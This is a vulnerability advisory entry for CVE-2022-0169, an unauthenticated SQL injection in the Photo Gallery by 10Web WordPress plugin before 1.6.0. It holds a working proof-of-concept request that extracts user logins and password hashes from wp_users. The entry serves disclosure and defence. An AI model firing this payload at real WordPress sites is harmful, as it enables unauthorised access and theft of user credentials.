Photo Gallery by 10Web < 1.6.0 – Unauthenticated SQL Injection | CVE 2022-0169 | Plugin Vulnerabilities

Description

The plugin does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(user_login,%200x2c,%20user_pass),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users%20--%20g

Affects Plugins

Fixed in 1.6.0

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2672822/photo-gallery#file9

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

0b4d870f-eab8-4544-91f8-9c5f0538709c

Timeline

Publicly Published

2022-02-15 (about 3 years ago)

Added

2022-02-15 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2015-03-16

Title

Pods 1.4.7 <= 2.5.1.1 - Blind SQL Injection

Published

2014-08-01

Title

WP-SpamFree 3.2.1 - Spam SQL Injection

Published

2023-04-24

Title

WP Visitor Statistics (Real Time Traffic) < 6.9 - Unauthenticated SQLi

Published

2025-03-27

Title

SEO Plugin by Squirrly SEO < 12.4.06 - Authenticated (Contributor+) SQL Injection

Published

2025-08-26

Title

Advance Seat Reservation Management for WooCommerce <= 3.1 - Unauthenticated SQL Injection